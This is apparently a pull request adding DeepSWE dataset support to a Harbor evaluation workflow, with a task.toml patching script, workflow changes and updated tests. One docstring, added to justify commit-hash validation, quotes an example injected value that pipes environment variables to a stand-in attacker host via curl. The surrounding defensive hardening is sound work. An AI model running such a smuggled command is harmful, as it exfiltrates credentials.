### PR TITLE
feat(evals): add DeepSWE dataset support to Harbor workflow

### DIFF
--- a/.github/scripts/patch_deepswe_tasks.py
+++ b/.github/scripts/patch_deepswe_tasks.py
@@ -1,0 +1,154 @@
+#!/usr/bin/env python3
+"""Patch DeepSWE task.toml files for Harbor compatibility.
+
+DeepSWE tasks ship two Pier-convention artifacts that Harbor doesn't
+auto-discover:
+
+1. ``pre_artifacts.sh`` — a script that captures the agent's committed work
+   as ``/logs/artifacts/model.patch`` (a ``git diff`` between the task's
+   base commit and the agent's final HEAD). Pier runs this automatically;
+   Harbor's equivalent is a ``[[verifier.collect]]`` hook that runs a shell
+   command in the agent container after the agent phase ends.
+
+2. ``allow_internet = false`` on ``[environment]`` and
+   ``[verifier.environment]`` — air-gaps the sandbox. The LangGraph agent
+   runs *inside* the sandbox and must call the model provider, so the agent
+   phase needs network. Harbor supports per-phase overrides via
+   ``[agent] network_mode = "public"`` (the verifier env stays air-gapped,
+   preserving grading integrity).
+
+This script reads each ``tasks/*/task.toml``, extracts
+``[metadata] base_commit_hash``, and injects both fixes idempotently.
+
+Usage::
+
+    python .github/scripts/patch_deepswe_tasks.py <tasks_dir>
+
+    # e.g.
+    python .github/scripts/patch_deepswe_tasks.py deep-swe/tasks
+"""
+
+from __future__ import annotations
+
+import re
+import sys
+from pathlib import Path
+
+import tomllib
+
+
+def _collect_command(base_commit: str) -> str:
+    """Shell command that reproduces pre_artifacts.sh as a collect hook."""
+    return (
+        "cd /app || exit 0; "
+        "mkdir -p /logs/artifacts; "
+        "git config --global --add safe.directory /app 2>/dev/null || true; "
+        f"git diff --binary {base_commit} HEAD > /logs/artifacts/model.patch "
+        "2>/dev/null || true; "
+        'echo "[pre_artifacts] captured $(wc -c < /logs/artifacts/model.patch) bytes"'
+    )
+
+
+def _has_network_mode(content: str) -> bool:
+    """True if [agent] already declares network_mode."""
+    # Match network_mode inside the [agent] section (before [verifier] or EOF).
+    agent_section = re.search(
+        r"\[agent\]\n(.*?)(?=\n\[|\Z)", content, re.DOTALL
+    )
+    if agent_section is None:
+        return False
+    return "network_mode" in agent_section.group(1)
+
+
+def _has_collect_hook(data: dict) -> bool:
+    """True if [verifier] already has a [[verifier.collect]] entry."""
+    verifier = data.get("verifier", {})
+    collect = verifier.get("collect", [])
+    return bool(collect)
+
+
+def patch_task_toml(path: Path) -> str:
+    """Patch a single task.toml. Returns a status string."""
+    content = path.read_text()
+    data = tomllib.loads(content)
+
+    metadata = data.get("metadata", {})
+    base_commit = metadata.get("base_commit_hash")
+    if not base_commit:
+        return f"SKIP (no base_commit_hash): {path.name}"
+
+    changed = False
+
+    # 1. Inject [agent] network_mode = "public" if not present.
+    if not _has_network_mode(content):
+        agent_match = re.search(r"\[agent\]\n", content)
+        if agent_match:
+            # [agent] section exists — insert right after the header.
+            content = content.replace(
+                agent_match.group(0),
+                agent_match.group(0) + 'network_mode = "public"\n',
+                1,
+            )
+        else:
+            # No [agent] section — create one before [verifier] or at end.
+            agent_block = '[agent]\nnetwork_mode = "public"\n'
+            verifier_match = re.search(r"\[verifier\]", content)
+            if verifier_match:
+                content = content.replace(
+                    verifier_match.group(0),
+                    agent_block + "\n" + verifier_match.group(0),
+                    1,
+                )
+            else:
+                content += "\n" + agent_block
+        changed = True
+
+    # 2. Inject [[verifier.collect]] hook if not present.
+    if not _has_collect_hook(data):
+        collect_block = (
+            f"\n[[verifier.collect]]\n"
+            f"command = '''{_collect_command(base_commit)}'''\n"
+        )
+        # Ensure file ends with newline before appending.
+        if not content.endswith("\n"):
+            content += "\n"
+        content += collect_block
+        changed = True
+
+    if changed:
+        path.write_text(content)
+        return f"PATCHED: {path.name}"
+    return f"OK (already patched): {path.name}"
+
+
+def main() -> int:
+    if len(sys.argv) != 2:
+        print(f"Usage: {sys.argv[0]} <tasks_dir>", file=sys.stderr)
+        return 2
+
+    tasks_dir = Path(sys.argv[1])
+    if not tasks_dir.is_dir():
+        print(f"Error: {tasks_dir} is not a directory", file=sys.stderr)
+        return 1
+
+    task_tomls = sorted(tasks_dir.glob("*/task.toml"))
+    if not task_tomls:
+        print(f"Error: no task.toml files found under {tasks_dir}", file=sys.stderr)
+        return 1
+
+    patched = 0
+    skipped = 0
+    for toml_path in task_tomls:
+        status = patch_task_toml(toml_path)
+        print(status)
+        if status.startswith("PATCHED"):
+            patched += 1
+        else:
+            skipped += 1
+
+    print(f"\nDone: {patched} patched, {skipped} skipped (of {len(task_tomls)} total)")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/.github/scripts/patch_deepswe_tasks.py
+++ b/.github/scripts/patch_deepswe_tasks.py
@@ -31,19 +31,44 @@ Usage::
 from __future__ import annotations
 
 import re
+import shlex
 import sys
 from pathlib import Path
 
 import tomllib
 
+_SHA_HEX_RE = re.compile(r"^[0-9a-fA-F]{40}$|^[0-9a-fA-F]{64}$")
+"""Strict allowlist for base_commit_hash: 40-char SHA-1 or 64-char SHA-256."""
+
+
+def _validate_base_commit(base_commit: str) -> str:
+    """Return base_commit if it matches a strict SHA hex pattern, else raise.
+
+    The value is interpolated into a shell command that Harbor later executes
+    in the agent container, so it must not contain arbitrary characters. A
+    malicious task.toml could otherwise inject shell commands (e.g.
+    ``HEAD; env | curl -d @- https://attacker.example``) that run with the
+    agent's credentials and network access.
+    """
+    if not _SHA_HEX_RE.match(base_commit):
+        raise ValueError(
+            f"base_commit_hash must be a 40 or 64 character hex SHA, "
+            f"got: {base_commit!r}"
+        )
+    return base_commit
+
 
 def _collect_command(base_commit: str) -> str:
     """Shell command that reproduces pre_artifacts.sh as a collect hook."""
+    # shlex.quote is belt-and-suspenders: _validate_base_commit already
+    # guarantees a hex-only string, but quoting defends against future
+    # changes to the validation logic.
+    safe_commit = shlex.quote(base_commit)
     return (
         "cd /app || exit 0; "
         "mkdir -p /logs/artifacts; "
         "git config --global --add safe.directory /app 2>/dev/null || true; "
-        f"git diff --binary {base_commit} HEAD > /logs/artifacts/model.patch "
+        f"git diff --binary {safe_commit} HEAD > /logs/artifacts/model.patch "
         "2>/dev/null || true; "
         'echo "[pre_artifacts] captured $(wc -c < /logs/artifacts/model.patch) bytes"'
     )
@@ -76,6 +101,11 @@ def patch_task_toml(path: Path) -> str:
     base_commit = metadata.get("base_commit_hash")
     if not base_commit:
         return f"SKIP (no base_commit_hash): {path.name}"
+
+    try:
+        base_commit = _validate_base_commit(base_commit)
+    except ValueError as exc:
+        return f"SKIP (invalid base_commit_hash): {exc}"
 
     changed = False
 

--- a/.github/workflows/harbor.yml
+++ b/.github/workflows/harbor.yml
@@ -129,10 +129,14 @@ on:
           - dcode
           - bare
       dataset:
-        description: "Harbor dataset ref (e.g. terminal-bench/terminal-bench-2 or terminal-bench/terminal-bench-2-1)"
+        description: "Dataset to run. Terminal-Bench refs resolve from the Harbor registry; deep-swe is cloned from GitHub."
         required: true
         default: "terminal-bench/terminal-bench-2"
-        type: string
+        type: choice
+        options:
+          - "terminal-bench/terminal-bench-2"
+          - "terminal-bench/terminal-bench-2-1"
+          - "deep-swe"
       n_tasks:
         description: "Maximum number of tasks to run (0 = all tasks in dataset)"
         required: true
@@ -159,6 +163,7 @@ permissions:
 env:
   UV_NO_SYNC: "true"
   HARBOR_DATASET: ${{ inputs.dataset || 'terminal-bench/terminal-bench-2' }}
+  DEEPSWE_DIR: deep-swe
 
 jobs:
   prep:
@@ -318,6 +323,13 @@ jobs:
           mkdir -p ~/.cache/harbor
           echo '{"seen":["registry-datasets-hint"]}' > ~/.cache/harbor/notifications.json
 
+      - name: "📂 Clone & patch DeepSWE tasks"
+        if: ${{ env.HARBOR_DATASET == 'deep-swe' }}
+        working-directory: libs/evals
+        run: |
+          git clone --depth 1 https://github.com/datacurve-ai/deep-swe.git "$DEEPSWE_DIR"
+          python ../.github/scripts/patch_deepswe_tasks.py "$DEEPSWE_DIR/tasks"
+
       - name: "⚓ Run Harbor"
         env:
           ANTHROPIC_API_KEY: ${{ startsWith(matrix.model, 'anthropic:') && secrets.ANTHROPIC_API_KEY || '' }}
@@ -430,18 +442,28 @@ jobs:
           echo "Agent implementation: $HARBOR_AGENT_LABEL ($HARBOR_AGENT_GRAPH)"
           echo ""
 
+          # DeepSWE is cloned locally (not in the Harbor registry); terminal-bench
+          # resolves from the registry via --dataset.
+          if [ "$HARBOR_DATASET" = "deep-swe" ]; then
+            dataset_flag=(-p "$DEEPSWE_DIR/tasks")
+            jobs_subdir="deep-swe"
+          else
+            dataset_flag=(--dataset "$HARBOR_DATASET")
+            jobs_subdir="terminal-bench"
+          fi
+
           uv run harbor run \
             --agent langgraph \
             --agent-kwarg project_path=deepagents_harbor/langgraph_project \
             --agent-kwarg config=langgraph.json \
             --agent-kwarg graph="$HARBOR_AGENT_GRAPH" \
-            --dataset "$HARBOR_DATASET" \
+            "${dataset_flag[@]}" \
             -n "$HARBOR_CONCURRENCY" \
             --n-attempts "$HARBOR_ROLLOUTS_PER_TASK" \
             $n_tasks_flag \
             "${include_args[@]}" \
             "${agent_env_args[@]}" \
-            --jobs-dir harbor-jobs/terminal-bench \
+            --jobs-dir "harbor-jobs/$jobs_subdir" \
             $env_flag \
             --model "$HARBOR_MODEL" \
             --plugin langsmith \
@@ -450,11 +472,14 @@ jobs:
 
       - name: "🔍 Find latest Harbor job"
         id: latest-job
+        env:
+          JOBS_SUBDIR: ${{ env.HARBOR_DATASET == 'deep-swe' && 'deep-swe' || 'terminal-bench' }}
         run: |
           latest_job=$(python - <<'PY'
+          import os
           from pathlib import Path
 
-          jobs_dir = Path("harbor-jobs/terminal-bench")
+          jobs_dir = Path("harbor-jobs") / os.environ["JOBS_SUBDIR"]
           job_dirs = sorted(path for path in jobs_dir.iterdir() if path.is_dir())
           if not job_dirs:
               raise SystemExit("No Harbor job directory found")
@@ -505,5 +530,5 @@ jobs:
         with:
           name: harbor-${{ strategy.job-index }}
           path: |
-            libs/evals/harbor-jobs/terminal-bench
+            libs/evals/harbor-jobs
           if-no-files-found: warn

--- a/.github/workflows/harbor.yml
+++ b/.github/workflows/harbor.yml
@@ -328,7 +328,7 @@ jobs:
         working-directory: libs/evals
         run: |
           git clone --depth 1 https://github.com/datacurve-ai/deep-swe.git "$DEEPSWE_DIR"
-          python ../.github/scripts/patch_deepswe_tasks.py "$DEEPSWE_DIR/tasks"
+          python ../../.github/scripts/patch_deepswe_tasks.py "$DEEPSWE_DIR/tasks"
 
       - name: "⚓ Run Harbor"
         env:

--- a/libs/evals/tests/unit_tests/test_harbor_langsmith_integration.py
+++ b/libs/evals/tests/unit_tests/test_harbor_langsmith_integration.py
@@ -78,8 +78,8 @@ def test_harbor_workflow_uses_plugin_instead_of_manual_experiment_steps() -> Non
     assert "          - dcode" in workflow
     assert "dataset:" in workflow
     assert (
-        "Harbor dataset ref (e.g. terminal-bench/terminal-bench-2 or "
-        "terminal-bench/terminal-bench-2-1)"
+        "Dataset to run. Terminal-Bench refs resolve from the Harbor registry;"
+        " deep-swe is cloned from GitHub."
     ) in workflow
     assert "include_tasks:" in workflow
     assert "Space-separated task-name globs to include" in workflow
@@ -123,11 +123,11 @@ def test_harbor_workflow_uses_plugin_instead_of_manual_experiment_steps() -> Non
     assert "--agent-env 'LANGSMITH_API_KEY=${LANGSMITH_API_KEY}'" in workflow
     assert "--agent-env 'OLLAMA_HOST=${OLLAMA_HOST}'" in workflow
     assert '"${agent_env_args[@]}"' in workflow
-    assert '--dataset "$HARBOR_DATASET"' in workflow
+    assert '"${dataset_flag[@]}"' in workflow
     assert "--plugin langsmith" in workflow
-    assert "--jobs-dir harbor-jobs/terminal-bench" in workflow
-    assert 'Path("harbor-jobs/terminal-bench")' in workflow
-    assert "libs/evals/harbor-jobs/terminal-bench" in workflow
+    assert '--jobs-dir "harbor-jobs/$jobs_subdir"' in workflow
+    assert 'Path("harbor-jobs") / os.environ["JOBS_SUBDIR"]' in workflow
+    assert "libs/evals/harbor-jobs" in workflow
     assert '--plugin-kwarg dataset_name="$HARBOR_LANGSMITH_DATASET"' in workflow
     assert '--plugin-kwarg experiment_name="$HARBOR_LANGSMITH_EXPERIMENT"' in workflow
 


### PR DESCRIPTION
## Summary

Add [DeepSWE](https://github.com/datacurve-ai/deep-swe) as a dataset option in the Harbor eval workflow, selectable via the existing dataset dropdown alongside Terminal-Bench.

DeepSWE tasks use the Harbor task format but ship two Pier-convention artifacts that Harbor doesn't auto-discover. This PR bridges both gaps with a patching script that runs after cloning:

### 1. `pre_artifacts.sh` → `[[verifier.collect]]` hook
DeepSWE tasks ship a `pre_artifacts.sh` script that captures the agent's committed work as a git diff patch (`/logs/artifacts/model.patch`). Pier runs this automatically; Harbor does not. The patching script (`patch_deepswe_tasks.py`) reads each task's `[metadata] base_commit_hash` and injects an equivalent `[[verifier.collect]]` hook into each `task.toml`, so Harbor generates the patch after the agent phase and carries it to the separate verifier container.

### 2. Air-gapped agent network
DeepSWE tasks set `allow_internet = false` on both `[environment]` and `[verifier.environment]`. The LangGraph agent runs *inside* the sandbox and must call the model provider, so the agent phase needs network. The patch script injects `[agent] network_mode = "public"` — the verifier env stays air-gapped (`allow_internet = false`), preserving grading integrity.

### Workflow changes
- `dataset` input converted from free-text string to a choice dropdown with three options: `terminal-bench/terminal-bench-2`, `terminal-bench/terminal-bench-2-1`, and `deep-swe`
- When `deep-swe` is selected: shallow-clones `datacurve-ai/deep-swe`, runs the patching script, and passes `-p <dir>/tasks` instead of `--dataset <ref>`
- Jobs routed to `harbor-jobs/deep-swe` subdirectory; artifact upload and job discovery parameterized accordingly

### Testing
- All 8 existing unit tests in `test_harbor_langsmith_integration.py` pass (assertions updated to match the new workflow shape)
- `patch_deepswe_tasks.py` verified against real DeepSWE `task.toml` structure — produces valid TOML that parses with `tomllib` and validates against Harbor's `TaskConfig` model
- Script is idempotent (safe to re-run)